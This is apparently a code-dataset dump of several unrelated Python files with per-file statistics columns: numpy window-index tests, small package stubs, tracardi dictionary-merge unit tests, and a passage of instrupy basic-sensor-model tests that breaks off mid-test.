assert (init_iy2_low, init_iy2_high) == (n2-nwin-1, n2-1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 15
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin-2, n2-2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_all_x1_less_than_x2():
""" Setup: np.all(x1 < x2.min()).
Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(100, 100+n2)
nwin = 5
for ix1 in range(n1):
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin), "ix1 = {0}".format(ix1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_all_x1_greater_than_x2():
""" Setup: np.all(x1 < x2.min()).
Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(-100, -100+n2)
nwin = 5
for ix1 in range(n1):
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2), "ix1 = {0}".format(ix1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
| 32.57377
| 86
| 0.674887
| 638
| 3,974
| 3.836991
| 0.10815
| 0.205882
| 0.147059
| 0.205882
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0
| 0.083654
| 0.214897
| 3,974
| 121
| 87
| 32.842975
| 0.700962
| 0.104177
| 0
| 0.707317
| 0
| 0
| 0.005128
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 1
| 0.04878
| false
| 0
| 0.02439
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b9dfdc75356229ddbebc9973a7df858418b6fb77
| 46
|
py
|
Python
|
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
from .screen_behaviour import screen_behaviour
| 46
| 46
| 0.913043
| 6
| 46
| 6.666667
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9e8a7754acfef3d93cda04c62e4e809ad243ecd
| 246
|
py
|
Python
|
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
from nextcord.ext.interactions.application_command import ApplicationCommand
class MessageCommand(ApplicationCommand):
"""
TODO: Implement
https://discord.com/developers/docs/interactions/application-commands#message-commands
"""
| 35.142857
| 90
| 0.792683
| 23
| 246
| 8.434783
| 0.826087
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109756
| 246
| 7
| 91
| 35.142857
| 0.885845
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9f29412f9d11e7cf345f39fa16f88272647c0da
| 150
|
py
|
Python
|
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
from .blackbox_metamodel_regression import BlackboxMetamodelRegression
from .blackbox_metamodel_classification import BlackboxMetamodelClassification
| 50
| 78
| 0.933333
| 12
| 150
| 11.333333
| 0.666667
| 0.176471
| 0.308824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053333
| 150
| 2
| 79
| 75
| 0.957746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a0eb8de80c2e638bf24b2808e6384b356b35777
| 8,673
|
py
|
Python
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 29
|
2021-04-17T06:04:46.000Z
|
2021-11-25T10:22:43.000Z
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 77
|
2021-04-03T21:20:04.000Z
|
2021-10-17T10:12:23.000Z
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 17
|
2021-06-29T13:13:18.000Z
|
2021-10-17T10:52:57.000Z
|
from datetime import datetime
from tracardi.service.merger import merge
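# Merge semantics exercised below (inferred from the assertions): values stored
# under the same key are combined into a de-duplicated list (tuples and sets are
# flattened into lists, None values are dropped), nested dicts are merged
# recursively, and incompatible combinations (scalar vs. dict, int vs. datetime,
# lists containing nested lists, datetime vs. list) raise ValueError, as the
# test_merger_conflict_* cases show.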
def test_merger_multiple_values():
a = {"a": None}
b = {"a": .2}
c = {"a": [1]}
d = {"a": "3"}
m = merge({}, [a, b, c, d])
assert set(m['a']).intersection({.2, 1, "3"}) == {.2, 1, "3"}
def test_merger_none_values():
a = {"a": None}
b = {"a": "2"}
assert merge({}, [a, b]) == {"a": "2"}
a = {"a": None}
b = {"a": None}
assert merge({}, [a, b]) == {}
def test_merger_missing_values():
a = {}
b = {"a": "2"}
assert merge({}, [a, b]) == {"a": "2"}
def test_merger_values_no_intersection():
a = {"b": 1}
b = {"a": "2"}
assert merge({}, [a, b]) == {"b": 1, "a": "2"}
def test_merger_single_values():
# mixed
a = {"a": 1}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
# string
a = {"a": "1"}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
# int
a = {"a": 1}
b = {"a": 2}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
# float
a = {"a": .1}
b = {"a": .2}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
def test_merger_bool_values():
a = {"a": True}
b = {"a": False, "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": True}
b = {"a": [False], "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": [True]}
b = {"a": False, "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": [True]}
b = {"a": (False,), "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
def test_merger_single_value_plus_list():
# mixed
a = {"a": [1]}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
a = {"a": 1}
b = {"a": ["2"]}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
# string
a = {"a": ["1"]}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
a = {"a": "1"}
b = {"a": ["2"]}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
# int
a = {"a": [1]}
b = {"a": 2}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
a = {"a": 1}
b = {"a": [2]}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
# float
a = {"a": [.1]}
b = {"a": .2}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
a = {"a": .1}
b = {"a": [.2]}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
def test_merger_uniq():
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": ["2", "1"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
def test_merger_immutable():
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert a == {"a": {"b": ["1", "2", "1"]}} and b == {"a": {"b": "2"}}
def test_merger_same_value():
a = {"b": 1}
b = {"b": 1}
c = merge({}, [a, b])
assert c == {"b": 1}
a = {"a": {"b": 1}}
b = {"a": {"b": 1}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": [1]}}
b = {"a": {"b": 1}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": 1}}
b = {"a": {"b": [1]}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": [1]}}
b = {"a": {"b": [1]}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
def test_merger_dict_single_values():
# mixed
a = {"a": {"b": 1}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or c == {"a": {"b": ["2", 1]}}
# string
a = {"a": {"b": "1"}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
# int
a = {"a": {"b": 1}}
b = {"a": {"b": 2}}
assert merge({}, [a, b]) == {"a": {"b": [1, 2]}}
# float
a = {"a": {"b": .1}}
b = {"a": {"b": .2}}
assert merge({}, [a, b]) == {"a": {"b": [.1, .2]}}
def test_merger_dict_list_2_list():
a = {"a": {"b": [1, 2]}}
b = {"a": {"b": [3, 4]}}
c = merge({}, [a, b])
assert "b" in c['a'] and set(c['a']['b']).intersection({1, 2, 3, 4}) == {1, 2, 3, 4}
a = {"a": [1, 2, 3]}
b = {"a": [3, 4, 5]}
c = merge({}, [a, b])
assert set(c['a']).intersection({1, 2, 3, 4, 5}) == {1, 2, 3, 4, 5}
def test_merger_dict_list_2_set():
a = {"a": {"b": {1, 2}}}
b = {"a": {"b": [3, 4]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": {"b": [1, 2]}}
b = {"a": {"b": {3, 4}}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": [1, 2, 3]}
b = {"a": {3, 4, 5}}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3, 4, 5]}
def test_merger_dict_set_2_set():
a = {"a": {"b": {1, 2}}}
b = {"a": {"b": {3, 4}}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": {1, 2, 3}}
b = {"a": {3, 4, 5}}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3, 4, 5]}
def test_merger_tuple_2_list():
"""
Merges tuple values into a list, together with scalar or list values
"""
a = {"a": 1}
b = {"a": (2, 3)}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3]}
a = {"a": [1]}
b = {"a": (2, 3)}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3]}
def test_merger_dict_single_list_values():
# mixed dict
a = {"a": {"b": [1]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or c == {"a": {"b": ["2", 1]}}
a = {"a": {"b": 1}}
b = {"a": {"b": ["2"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or {"a": {"b": ["2", 1]}}
# int
a = {"a": {"b": [1]}}
b = {"a": {"b": 2}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2]}} or c == {"a": {"b": [2, 1]}}
a = {"a": {"b": 1}}
b = {"a": {"b": [2]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2]}} or c == {"a": {"b": [2, 1]}}
# float
a = {"a": {"b": [.1]}}
b = {"a": {"b": .2}}
c = merge({}, [a, b])
assert c == {"a": {"b": [.1, .2]}} or c == {"a": {"b": [.2, .1]}}
a = {"a": {"b": .1}}
b = {"a": {"b": [.2]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [.1, .2]}} or c == {"a": {"b": [.2, .1]}}
# string
a = {"a": {"b": ["1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
a = {"a": {"b": "1"}}
b = {"a": {"b": ["2"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
def test_merger_conflict_1():
"""
A conflict between a scalar value and a nested dict raises ValueError
"""
a = {"a": 1}
b = {"a": {"b": 1}}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": {"b": 1}}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_2():
"""
A conflict between values of incompatible types (int vs datetime) raises ValueError
"""
a = {"a": 1}
b = {"a": datetime.now()}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_3():
"""
Conflict inside list of values
"""
a = {"a": 1}
b = {"a": [2, [3]]}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": [2, [3]]}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": (2, [3])}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": 1}
b = {"a": (2, [3])}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_4():
"""
Conflict inside list of values
"""
a = {"a": datetime.now}
b = {"a": [2, 3]}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": datetime.now()}
b = {"a": [2, 3]}
try:
merge({}, [a, b])
except ValueError:
assert True
| 21.521092
| 88
| 0.335293
| 1,335
| 8,673
| 2.125094
| 0.041948
| 0.102926
| 0.145576
| 0.121255
| 0.865703
| 0.81565
| 0.808248
| 0.77018
| 0.764188
| 0.736341
| 0
| 0.053179
| 0.323533
| 8,673
| 402
| 89
| 21.574627
| 0.430373
| 0.031823
| 0
| 0.786765
| 0
| 0
| 0.045268
| 0
| 0
| 0
| 0
| 0
| 0.216912
| 1
| 0.073529
| false
| 0
| 0.007353
| 0
| 0.080882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e071ae46387661fb262c4873fe39b493e313e755
| 41,899
|
py
|
Python
|
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
tests/test_basic_sensor_model.py
|
bgorr/instrupy
|
e3dca871ce2dcd2ef279898fcc36bf9d18f0c243
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for instrupy.basic_sensor_model.
"""
import unittest
import numpy as np
import random
from deepdiff import DeepDiff
from instrupy.basic_sensor_model import BasicSensorModel
from instrupy.util import Orientation, ViewGeometry, SphericalGeometry, ReferenceFrame, SyntheticDataConfiguration, Maneuver
RE = 6378.137 # [km] radius of Earth
def orbital_speed(alt_km):
return np.sqrt(398600.5/(RE + alt_km))
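# Helper note: this is the circular-orbit speed v = sqrt(mu / r) with
# mu = 398600.5 km^3/s^2 (Earth's GM) and r = RE + alt_km in km, giving km/s.
# In these tests only the direction of the velocity vector matters (it can flip
# the sign of the look angle); the magnitude itself is never asserted.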
class TestBasicSensorModel(unittest.TestCase):
def test_from_json(self):
""" Test initialization of basic sensor in the many different ways allowed.
"""
# Typical case
o = BasicSensorModel.from_json('{"name": "Atom", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs1", \
"pointingOption": [{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, \
{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":10}, \
{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":-10} \
], \
"syntheticDataConfig": {"sourceFilePaths": ["C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f000.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f001.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f002.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f003.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f004.nc"], \
"geophysicalVar": "TMP_P0_L1_GLL0", "interpolMethod":"SCIPY_LINEAR"}}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertEqual(o.name, "Atom")
self.assertIsInstance(o.name, str)
self.assertIsInstance(o._id, str)
self.assertEqual(o._id, "bs1")
self.assertEqual(o.mass, 10)
self.assertIsInstance(o.mass, float)
self.assertEqual(o.volume, 12.45)
self.assertIsInstance(o.volume, float)
self.assertEqual(o.power, 12)
self.assertIsInstance(o.power, float)
self.assertEqual(o.dataRate, 40)
self.assertIsInstance(o.dataRate, float)
self.assertEqual(o.bitsPerPixel, 8)
self.assertIsInstance(o.bitsPerPixel, int)
self.assertIsInstance(o.orientation, Orientation)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}))
self.assertIsInstance(o.fieldOfView, ViewGeometry)
self.assertEqual(o.fieldOfView, ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter":5})))
self.assertIsInstance(o.sceneFieldOfView, ViewGeometry)
self.assertEqual(o.sceneFieldOfView, o.fieldOfView) # since sceneFieldOfView is not initialized, it is equal to the instrument fieldOfView
self.assertIsInstance(o.maneuver, Maneuver)
self.assertEqual(o.maneuver, Maneuver.from_dict({"maneuverType": "CIRCULAR", "diameter":10}))
self.assertIsInstance(o.pointingOption, list)
self.assertIsInstance(o.pointingOption[0], Orientation)
self.assertIsInstance(o.pointingOption[1], Orientation)
self.assertIsInstance(o.pointingOption[2], Orientation)
self.assertEqual(o.pointingOption[0], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}))
self.assertEqual(o.pointingOption[1], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":10}))
self.assertEqual(o.pointingOption[2], Orientation.from_dict({"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK","sideLookAngle":-10}))
self.assertIsInstance(o.fieldOfRegard[0], ViewGeometry)
self.assertEqual(o.fieldOfRegard[0], ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter":15})))
self.assertEqual(len(o.fieldOfRegard), 1)
self.assertEqual(o.numberDetectorRows, 5)
self.assertIsInstance(o.numberDetectorRows, int)
self.assertEqual(o.numberDetectorCols, 10)
self.assertIsInstance(o.numberDetectorCols, int)
self.assertIsInstance(o.syntheticDataConfig, SyntheticDataConfiguration)
self.assertEqual(o.syntheticDataConfig, SyntheticDataConfiguration.from_dict({"sourceFilePaths": ["C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f000.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f001.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f002.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f003.nc", \
"C:/workspace/gfs_forecast_data/gfs.t12z.pgrb2.0p25.f004.nc"], \
"geophysicalVar": "TMP_P0_L1_GLL0", "interpolMethod":"SCIPY_LINEAR"}))
# Test default initialization of orientation, fieldOfViewGeometry, sceneFieldOfViewGeometry, maneuver, numberDetectorRows, numberDetectorCols
o = BasicSensorModel.from_json('{}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertIsNone(o.name)
self.assertIsNotNone(o._id) # random id is assigned
self.assertIsNone(o.mass)
self.assertIsNone(o.volume)
self.assertIsNone(o.power)
self.assertIsNone(o.dataRate)
self.assertIsNone(o.bitsPerPixel)
self.assertIsInstance(o.orientation, Orientation)
self.assertEqual(o.orientation, Orientation.from_dict({"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}))
self.assertEqual(o.fieldOfView, ViewGeometry(orien=Orientation.from_dict({"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}), sph_geom=SphericalGeometry.from_dict({"shape":"Circular", "diameter": 25})))
self.assertIsInstance(o.sceneFieldOfView, ViewGeometry)
self.assertEqual(o.sceneFieldOfView, o.fieldOfView) # since sceneFieldOfView is not initialized, it is equal to the instrument fieldOfView
self.assertIsNone(o.maneuver, Maneuver)
self.assertIsNone(o.fieldOfRegard)
self.assertEqual(o.numberDetectorRows, 4)
self.assertIsInstance(o.numberDetectorRows, int)
self.assertEqual(o.numberDetectorCols, 4)
self.assertIsInstance(o.numberDetectorCols, int)
self.assertIsNone(o.syntheticDataConfig)
# Test sceneFieldOfViewGeometry and corresponding fieldOfRegard initialization (fieldOfRegard must be built considering sceneFieldOfViewGeometry and not fieldOfViewGeometry)
o = BasicSensorModel.from_json('{"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":0.1, "angleWidth":60 }, \
"sceneFieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":60}, \
"maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":0, "A_rollMax": 30} \
}')
self.assertIsInstance(o, BasicSensorModel)
self.assertEqual(o._type, "Basic Sensor")
self.assertEqual(o.fieldOfView, ViewGeometry.from_dict({"orientation": {"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":0.1, "angleWidth":60}}))
self.assertEqual(o.sceneFieldOfView, ViewGeometry.from_dict({"orientation": {"referenceFrame":"SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":60}}))
ddiff = DeepDiff(o.fieldOfRegard, [ViewGeometry.from_dict({"orientation": {"referenceFrame":"NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":15},
"sphericalGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":90}})], ignore_numeric_type_changes=True)
self.assertEqual(ddiff, {}, msg=ddiff)
# Test: Incomplete field-of-view geometry specification, test that Exception is raised
with self.assertRaises(Exception):
BasicSensorModel.from_json('{"name": "Atom","mass":10,"volume":12.45, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight": 10 }}')
def test_calc_data_metrics_1(self):
""" Simple test involving satellite above POI at (lat = 0,lon = 0). Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the calculations below. They do, however, influence the coverage calculations (which are not covered by this test).
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], 500, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 0, delta = 0.1)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], 0, delta = 0.1)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and (lat=0, lon=0) position
def test_calc_data_metrics_2_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the East.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the calculations below. They do, however, influence the coverage calculations (which are not covered by this test).
The velocity vector may influence the sign of the look angle.
Tested against a reference model that is accurate for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# 0 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# 90 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -7.6126} # altitude 500 km
